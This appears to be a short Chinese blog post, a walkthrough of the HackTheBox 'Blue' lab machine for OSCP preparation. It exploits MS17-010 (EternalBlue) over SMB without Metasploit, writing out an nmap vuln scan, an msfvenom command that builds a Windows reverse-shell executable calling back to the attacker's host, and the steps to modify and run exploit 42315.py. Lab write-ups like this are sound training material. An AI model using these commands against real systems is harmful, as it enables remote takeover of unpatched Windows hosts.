hackthebox-Blue(考点:smb 蓝)不用msf
程序员文章站
2022-07-15 13:42:53
...
这个机子用msf做很快。针对oscp备考者,这篇文章不用msf。
nmap
没啥其他端口,就是smb。用我们对smb常用的扫描方法
nmap -p 445 --script vuln 10.10.10.40
提示这台ms17-010 是有漏洞的。
searchsploit ms17-010
有好多,最后选择倒数第二个 42315.py
先准备好这个脚本要传的弹shell的exe。
msfvenom lhost=10.10.14.57 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > dev.exe
再对py进行修改。这里加入// 用来登录
这里修改上传exe的路径,和执行exe的cmd指令
最后运行脚本。
python 42315.py 10.10.10.40
但可能你的电脑也会报错,比如没有mysmb模块
git clone https://github.com/worawit/MS17-010
再把42315.py脚本放进ms17-010的文件夹
再次运行,打开监听,搞定